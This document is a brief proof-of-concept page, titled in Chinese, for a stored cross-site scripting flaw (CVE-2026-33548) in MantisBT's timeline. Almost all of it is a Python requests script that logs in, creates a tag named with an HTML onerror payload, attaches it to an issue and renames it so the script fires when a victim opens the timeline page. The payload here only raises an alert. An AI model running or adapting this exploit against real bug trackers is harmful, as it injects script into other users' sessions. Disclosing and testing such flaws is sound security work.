CVE-2026-33548 MantisBT存储型XSS漏洞

# PoC for CVE-2026-33548: Stored XSS in MantisBT Timeline # This script demonstrates how a malicious tag name can trigger XSS. import requests target_url = "http://target-mantisbt" username = "attacker" password = "password" session = requests.Session() login_payload = {"username": username, "password": password} session.post(f"{target_url}/login.php", data=login_payload) # Step 1: Create a tag with a malicious payload xss_payload = "<img src=x onerror=alert('CVE-2026-33548')>" tag_data = {"name": xss_payload, "description": "Malicious Tag"} session.post(f"{target_url}/tags_create.php", data=tag_data) print("[+] Malicious tag created.") # Step 2: Attach tag to an issue (e.g. ID 1) to generate history issue_payload = {"issue_id": "1", "tag_name": xss_payload} session.post(f"{target_url}/tag_attach.php", data=issue_payload) print("[+] Tag attached to issue.") # Step 3: Rename the tag to trigger the history event rename_payload = {"tag_name": xss_payload, "new_name": "SafeTag"} session.post(f"{target_url}/tags_update.php", data=rename_payload) print("[+] Tag renamed. XSS payload is now in history.") # Exploit: Victim visits my_view_page.php, the XSS triggers. print("[+] Trigger: Victim views the Timeline page.")